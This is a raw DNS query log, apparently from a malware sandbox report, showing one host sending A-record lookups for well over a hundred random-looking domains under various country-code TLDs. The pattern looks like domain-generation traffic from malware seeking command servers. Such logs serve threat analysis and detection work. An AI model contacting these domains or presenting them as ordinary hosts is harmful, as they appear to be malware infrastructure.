                                                                                                                                                                    Sep 7, 2024 15:34:02.728389025 CEST192.168.2.121.1.1.10xebf6Standard query (0)egqafiwiaqocq.vgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:03.368984938 CEST192.168.2.121.1.1.10x1568Standard query (0)viiaotleq.wsA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:03.994112968 CEST192.168.2.121.1.1.10x4930Standard query (0)fuokzkoyn.stA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:04.134828091 CEST192.168.2.121.1.1.10x9987Standard query (0)uswgaew.mpA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:04.479046106 CEST192.168.2.121.1.1.10xc8dcStandard query (0)yqymasgdwtbek.stA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:04.619697094 CEST192.168.2.121.1.1.10x31baStandard query (0)uicuzgeyypz.vgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:05.228272915 CEST192.168.2.121.1.1.10x960eStandard query (0)yqnirusysaj.krA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:05.353241920 CEST192.168.2.121.1.1.10x880Standard query (0)tebscyiqw.cmA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:05.681720972 CEST192.168.2.121.1.1.10x2695Standard query (0)uzygawe.nuA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:05.806375980 CEST192.168.2.121.1.1.10x8aeStandard query (0)uciaytygm.nuA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:05.931368113 CEST192.168.2.121.1.1.10xa90bStandard query (0)woukmmo.mpA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:06.150173903 CEST192.168.2.121.1.1.10x70baStandard query (0)rwmjwroq.phA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:06.462645054 CEST192.168.2.121.1.1.10x26f7Standard query (0)qteqgagae.rwA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:07.072546959 CEST192.168.2.121.1.1.10x495bStandard query (0)mkxsdgyrsnuny.phA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:07.713227034 CEST192.168.2.121.1.1.10xf040Standard query (0)xcsyc.cgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:07.963151932 CEST192.168.2.121.1.1.10xbd42Standard query (0)uilghhpmueun.cmA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:08.414036989 CEST192.168.2.121.1.1.10xc8b8Standard query (0)sgquyqg.wsA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:09.072628975 CEST192.168.2.121.1.1.10xbecbStandard query (0)qkysyuydwqu.mpA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:09.291546106 CEST192.168.2.121.1.1.10xaf08Standard query (0)wbisbwimhhhup.mpA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:09.493957043 CEST192.168.2.121.1.1.10xa3ddStandard query (0)ubyjmuise.krA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:09.620171070 CEST192.168.2.121.1.1.10xa463Standard query (0)itomvwhp.krA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:09.993840933 CEST192.168.2.121.1.1.10xbe4bStandard query (0)qgiikzk.wsA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:10.621890068 CEST192.168.2.121.1.1.10x267fStandard query (0)zsuli.stA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:10.830605030 CEST192.168.2.121.1.1.10xa6dbStandard query (0)iaxnaf.phA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:11.446944952 CEST192.168.2.121.1.1.10x416dStandard query (0)uzekiyy.stA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:11.587526083 CEST192.168.2.121.1.1.10x8542Standard query (0)miezkifgq.wsA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:12.337551117 CEST192.168.2.121.1.1.10xb73Standard query (0)aakqag.nuA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:12.478374004 CEST192.168.2.121.1.1.10x9946Standard query (0)wdekkqy.phA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:13.119481087 CEST192.168.2.121.1.1.10x8875Standard query (0)yvuqgqtpuia.stA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:13.525167942 CEST192.168.2.121.1.1.10x7d4cStandard query (0)cunyqsqr.nuA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:13.650346041 CEST192.168.2.121.1.1.10xd517Standard query (0)ivsxiq.tkA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:14.009459019 CEST192.168.2.121.1.1.10x2c28Standard query (0)mmkcusipflmcq.cmA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:14.290879965 CEST192.168.2.121.1.1.10x2405Standard query (0)oooeuui.stA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:14.681869984 CEST192.168.2.121.1.1.10x191cStandard query (0)cwajuaswd.cmA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:14.806675911 CEST192.168.2.121.1.1.10x8dd4Standard query (0)rrksi.mpA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:15.119019985 CEST192.168.2.121.1.1.10x2f8bStandard query (0)ioauwacqnunkfe.wsA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:15.790874958 CEST192.168.2.121.1.1.10x36fcStandard query (0)mkakmwtu.phA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:16.431473017 CEST192.168.2.121.1.1.10xb3c7Standard query (0)cewaq.nuA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:16.556759119 CEST192.168.2.121.1.1.10x734fStandard query (0)bwenqrwgiaihf.vgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:17.243938923 CEST192.168.2.121.1.1.10xd2eStandard query (0)haenyxj.nuA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:17.369944096 CEST192.168.2.121.1.1.10x54c6Standard query (0)gqesbimbmu.wsA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:18.009552956 CEST192.168.2.121.1.1.10x2444Standard query (0)wakmcawmo.mpA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:18.228169918 CEST192.168.2.121.1.1.10x9c17Standard query (0)ajyswracs.rwA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:18.353519917 CEST192.168.2.121.1.1.10x8d72Standard query (0)ccecvpu.stA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:18.493935108 CEST192.168.2.121.1.1.10xfa34Standard query (0)iisiamiqchpkf.nuA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:18.618825912 CEST192.168.2.121.1.1.10x8458Standard query (0)siosbpgeiahyu.krA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:19.009530067 CEST192.168.2.121.1.1.10xf649Standard query (0)eaiulccm.cmA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:19.306523085 CEST192.168.2.121.1.1.10x9bdaStandard query (0)mfxspmq.nuA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:19.446844101 CEST192.168.2.121.1.1.10x1fd0Standard query (0)umauopcgfqq.rwA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:19.587553024 CEST192.168.2.121.1.1.10xa52cStandard query (0)yaawpiaquwk.cmA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:19.884453058 CEST192.168.2.121.1.1.10x51bcStandard query (0)akgggynwmtrgwh.phA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:20.524988890 CEST192.168.2.121.1.1.10x38e0Standard query (0)wczmvvs.mpA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:20.962718010 CEST192.168.2.121.1.1.10x2002Standard query (0)zmpvcez.cmA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:21.243906021 CEST192.168.2.121.1.1.10x9969Standard query (0)qcoszo.phA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:21.541085958 CEST192.168.2.121.1.1.10xac1eStandard query (0)excicmezoskdep.tkA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:21.821913004 CEST192.168.2.121.1.1.10xf0ccStandard query (0)khiowcxqg.vgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:22.446042061 CEST192.168.2.121.1.1.10x8c1dStandard query (0)oqwktwc.cmA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:22.776772976 CEST192.168.2.121.1.1.10x6468Standard query (0)cdcueqtmjixig.vgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:23.462755919 CEST192.168.2.121.1.1.10xefc2Standard query (0)ncjwytiai.rwA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:23.666229963 CEST192.168.2.121.1.1.10xe062Standard query (0)fdcjgqsraedu.cgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:23.837621927 CEST192.168.2.121.1.1.10xbd9Standard query (0)wwjfjwkbe.rwA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:24.450326920 CEST192.168.2.121.1.1.10xd332Standard query (0)creqwgcal.wsA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:25.087531090 CEST192.168.2.121.1.1.10xf4a1Standard query (0)gowravdyagf.tkA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:25.369122982 CEST192.168.2.121.1.1.10x6de1Standard query (0)goowamy.cmA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:25.650012016 CEST192.168.2.121.1.1.10xffb4Standard query (0)qywresbs.mpA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:26.587651968 CEST192.168.2.121.1.1.10x1f53Standard query (0)gfrcjlice.mpA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:26.931705952 CEST192.168.2.121.1.1.10xed05Standard query (0)kzagkogkm.stA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:27.072151899 CEST192.168.2.121.1.1.10xccc7Standard query (0)mjlgadcmryrzm.vgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:27.947331905 CEST192.168.2.121.1.1.10x21c8Standard query (0)wolemymal.phA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:28.572011948 CEST192.168.2.121.1.1.10x52aStandard query (0)ywmykx.tkA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:28.837699890 CEST192.168.2.121.1.1.10xdc38Standard query (0)uwqsqkc.rwA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:29.447001934 CEST192.168.2.121.1.1.10xf984Standard query (0)lgyczssqg.vgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:30.134836912 CEST192.168.2.121.1.1.10x63bfStandard query (0)dmkxrdukmfmesx.mpA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:30.478301048 CEST192.168.2.121.1.1.10xfb62Standard query (0)gguqivslu.wsA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:31.103722095 CEST192.168.2.121.1.1.10xc94eStandard query (0)suqjayddo.stA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:31.243859053 CEST192.168.2.121.1.1.10x5c3aStandard query (0)wuaizix.wsA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:31.884747028 CEST192.168.2.121.1.1.10x2bfbStandard query (0)sucqey.tkA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:32.165786028 CEST192.168.2.121.1.1.10xaff4Standard query (0)phxszkaqnas.wsA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:32.806293011 CEST192.168.2.121.1.1.10xf1cdStandard query (0)misooios.wsA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:33.431436062 CEST192.168.2.121.1.1.10xb701Standard query (0)aymaudvek.cgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:33.572726011 CEST192.168.2.121.1.1.10x5410Standard query (0)jcuccup.tkA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:33.837542057 CEST192.168.2.121.1.1.10x583eStandard query (0)kkugbysfjzw.phA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:34.587558031 CEST192.168.2.121.1.1.10xfc55Standard query (0)styacskwwcywk.vgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:35.400090933 CEST192.168.2.121.1.1.10x2b2aStandard query (0)mctaekjmuuq.rwA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:36.009592056 CEST192.168.2.121.1.1.10x6836Standard query (0)xorcpojewayfe.stA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:36.150907040 CEST192.168.2.121.1.1.10x6a1aStandard query (0)ickoadgsoyohk.rwA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:36.853432894 CEST192.168.2.121.1.1.10xf8edStandard query (0)gduug.cmA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:37.134620905 CEST192.168.2.121.1.1.10x3e79Standard query (0)accsccmowehao.tkA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:37.415693998 CEST192.168.2.121.1.1.10x9cc9Standard query (0)mqyueqcqydgxy.krA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:37.854032040 CEST192.168.2.121.1.1.10x70f3Standard query (0)euoylbyiylkxs.krA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:37.978595018 CEST192.168.2.121.1.1.10x4603Standard query (0)yyxeqva.rwA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:38.197199106 CEST192.168.2.121.1.1.10xeec1Standard query (0)yulrunpmqx.wsA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:38.853230000 CEST192.168.2.121.1.1.10x649eStandard query (0)wvitqodejuric.mpA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:39.197046041 CEST192.168.2.121.1.1.10x1ea5Standard query (0)csrsmscor.krA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:39.634458065 CEST192.168.2.121.1.1.10xac9eStandard query (0)ekcqikxygcx.rwA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:40.244971991 CEST192.168.2.121.1.1.10x867dStandard query (0)knjicci.tkA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:40.618740082 CEST192.168.2.121.1.1.10x27f3Standard query (0)oksgicosklksd.mpA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:40.962697029 CEST192.168.2.121.1.1.10xcac9Standard query (0)caigjpcy.tkA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:41.322031975 CEST192.168.2.121.1.1.10xce58Standard query (0)awgeqiq.nuA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:41.446988106 CEST192.168.2.121.1.1.10x39a7Standard query (0)mgwew.mpA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:41.650121927 CEST192.168.2.121.1.1.10xaee1Standard query (0)saiooyzlabq.cgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:41.790890932 CEST192.168.2.121.1.1.10x1c30Standard query (0)kqiesgxkisz.mpA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:42.010519981 CEST192.168.2.121.1.1.10xf80bStandard query (0)saggg.mpA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:42.354125023 CEST192.168.2.121.1.1.10xd08fStandard query (0)mhfqiwwe.vgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:42.978230953 CEST192.168.2.121.1.1.10x5a1bStandard query (0)ybciw.vgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:43.603317976 CEST192.168.2.121.1.1.10xb204Standard query (0)saveljusy.mpA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:43.821883917 CEST192.168.2.121.1.1.10x169dStandard query (0)akskgg.vgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:44.478203058 CEST192.168.2.121.1.1.10x6784Standard query (0)uikumvgjyksoh.cmA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:44.759413958 CEST192.168.2.121.1.1.10x81e9Standard query (0)uasguiiow.cmA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:45.072324038 CEST192.168.2.121.1.1.10x8b69Standard query (0)skqyyvmwupvaz.stA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:45.228499889 CEST192.168.2.121.1.1.10xb1c9Standard query (0)rhickthksz.phA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:45.838500023 CEST192.168.2.121.1.1.10x2211Standard query (0)wzpzwu.krA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:45.962519884 CEST192.168.2.121.1.1.10x7882Standard query (0)atcgganeiqayrm.tkA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:46.243747950 CEST192.168.2.121.1.1.10x40b5Standard query (0)upwmm.cmA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:46.525069952 CEST192.168.2.121.1.1.10x68faStandard query (0)qmgdaeuaqkimy.mpA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:46.728137970 CEST192.168.2.121.1.1.10xbb63Standard query (0)dgidsqg.tkA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:47.009398937 CEST192.168.2.121.1.1.10xebe6Standard query (0)xpuphcszyomaa.nuA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:47.135204077 CEST192.168.2.121.1.1.10x2e48Standard query (0)wjazfitj.tkA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:47.399998903 CEST192.168.2.121.1.1.10x1d5eStandard query (0)aomlcfimik.krA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:47.525438070 CEST192.168.2.121.1.1.10x40eeStandard query (0)odpusvdhh.vgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:48.166043997 CEST192.168.2.121.1.1.10xa976Standard query (0)ujwugkqnsskb.phA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:48.806314945 CEST192.168.2.121.1.1.10xe28cStandard query (0)gxtuidxcei.krA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:48.931309938 CEST192.168.2.121.1.1.10x6234Standard query (0)tckecpf.cmA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:49.259547949 CEST192.168.2.121.1.1.10xcb83Standard query (0)xtmumoejcozau.stA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:49.400152922 CEST192.168.2.121.1.1.10xb6e2Standard query (0)ggmqqfx.vgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:50.056262016 CEST192.168.2.121.1.1.10x39f3Standard query (0)oaanaugm.nuA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:50.181411028 CEST192.168.2.121.1.1.10x97aeStandard query (0)rrcucpyho.tkA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:50.447174072 CEST192.168.2.121.1.1.10xb54eStandard query (0)kmkduidemcic.vgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:51.087965965 CEST192.168.2.121.1.1.10x5cddStandard query (0)imvojuiuy.phA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:51.713888884 CEST192.168.2.121.1.1.10x7a17Standard query (0)uisgnpbxcwt.nuA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:51.837654114 CEST192.168.2.121.1.1.10x8fdeStandard query (0)uievevb.tkA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:52.277801991 CEST192.168.2.121.1.1.10xdc0dStandard query (0)uyargqkmysmey.krA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:52.400087118 CEST192.168.2.121.1.1.10xa28dStandard query (0)fwcaiytkn.vgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:53.025110006 CEST192.168.2.121.1.1.10x33daStandard query (0)otnrvewckyg.vgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:53.650060892 CEST192.168.2.121.1.1.10xf880Standard query (0)bgadyrzznoyrc.mpA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:53.868978977 CEST192.168.2.121.1.1.10x8441Standard query (0)awaqewyoeai.rwA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:54.556299925 CEST192.168.2.121.1.1.10x4749Standard query (0)uolgogccyd.nuA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:54.682001114 CEST192.168.2.121.1.1.10x4a05Standard query (0)wzaukej.stA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:54.868813038 CEST192.168.2.121.1.1.10x1ea2Standard query (0)ukdmkkjgocnyo.cmA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:55.149949074 CEST192.168.2.121.1.1.10x50c0Standard query (0)sqrukqcc.krA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:55.603450060 CEST192.168.2.121.1.1.10xaf07Standard query (0)uaaqyqcwqqcja.cmA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:55.916088104 CEST192.168.2.121.1.1.10x2d5dStandard query (0)wdgvpde.vgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:56.743922949 CEST192.168.2.121.1.1.10x3c58Standard query (0)vwgsgxihg.rwA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:57.462817907 CEST192.168.2.121.1.1.10xfc37Standard query (0)eoioakgkotsqa.cgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:57.634491920 CEST192.168.2.121.1.1.10x77e2Standard query (0)ecbgsaizaye.vgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:58.290683985 CEST192.168.2.121.1.1.10x6a9dStandard query (0)sywoee.phA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:59.165612936 CEST192.168.2.121.1.1.10xe577Standard query (0)wjwgiookysh.phA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:34:59.790707111 CEST192.168.2.121.1.1.10xb67cStandard query (0)ayhkewtoowynm.mpA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:00.139940023 CEST192.168.2.121.1.1.10x463eStandard query (0)ugepizy.tkA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:00.415592909 CEST192.168.2.121.1.1.10x5aafStandard query (0)esqdmcu.tkA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:00.712616920 CEST192.168.2.121.1.1.10xde6cStandard query (0)uumpqmnkuxm.nuA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:00.837584019 CEST192.168.2.121.1.1.10x8935Standard query (0)cygywai.stA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:00.978255033 CEST192.168.2.121.1.1.10xba79Standard query (0)eyjcvbziqkn.vgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:01.618911982 CEST192.168.2.121.1.1.10x2b90Standard query (0)ntinscv.phA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:01.931611061 CEST192.168.2.121.1.1.10x1636Standard query (0)icsxgkctc.mpA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:02.197268009 CEST192.168.2.121.1.1.10x1636Standard query (0)icsxgkctc.mpA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:02.605360985 CEST192.168.2.121.1.1.10xe3b5Standard query (0)rkqes.vgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:03.243757010 CEST192.168.2.121.1.1.10x1e6eStandard query (0)suiquqqgreg.stA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:03.386517048 CEST192.168.2.121.1.1.10x1bcaStandard query (0)uhaxqibqr.nuA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:03.510734081 CEST192.168.2.121.1.1.10xb0c0Standard query (0)wxaealkrmj.nuA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:03.651655912 CEST192.168.2.121.1.1.10xf288Standard query (0)skizcgujnggu.krA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:03.899883986 CEST192.168.2.121.1.1.10xf288Standard query (0)skizcgujnggu.krA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:04.041562080 CEST192.168.2.121.1.1.10x15c7Standard query (0)epcpawkywhm.mpA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:04.384608030 CEST192.168.2.121.1.1.10xa462Standard query (0)lkmwbwt.wsA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:05.025489092 CEST192.168.2.121.1.1.10x501fStandard query (0)qmqwqnyiseic.cmA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:05.354129076 CEST192.168.2.121.1.1.10xc10dStandard query (0)zcmujoksg.wsA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:05.993779898 CEST192.168.2.121.1.1.10x4c19Standard query (0)ksgrcuwwd.mpA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:06.337716103 CEST192.168.2.121.1.1.10xf88aStandard query (0)bmjueaufs.nuA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:06.465176105 CEST192.168.2.121.1.1.10x6400Standard query (0)pqbauaocat.rwA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:06.667761087 CEST192.168.2.121.1.1.10x9710Standard query (0)ocvix.phA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:07.368855000 CEST192.168.2.121.1.1.10x1217Standard query (0)tgkku.wsA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:07.993711948 CEST192.168.2.121.1.1.10x5364Standard query (0)uikbs.cmA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:08.290744066 CEST192.168.2.121.1.1.10x27deStandard query (0)ezgapahxw.stA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:08.432066917 CEST192.168.2.121.1.1.10x1c7aStandard query (0)weezkmf.wsA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:09.228168011 CEST192.168.2.121.1.1.10xb93cStandard query (0)obzal.cmA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:09.547914028 CEST192.168.2.121.1.1.10x3052Standard query (0)lczyerqngqyyw.cmA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:09.838622093 CEST192.168.2.121.1.1.10x9d48Standard query (0)mxcsyru.mpA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:10.056860924 CEST192.168.2.121.1.1.10xf9deStandard query (0)wnocrmqhv.rwA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:10.322163105 CEST192.168.2.121.1.1.10xf9deStandard query (0)wnocrmqhv.rwA (IP address)IN (0x0001)false
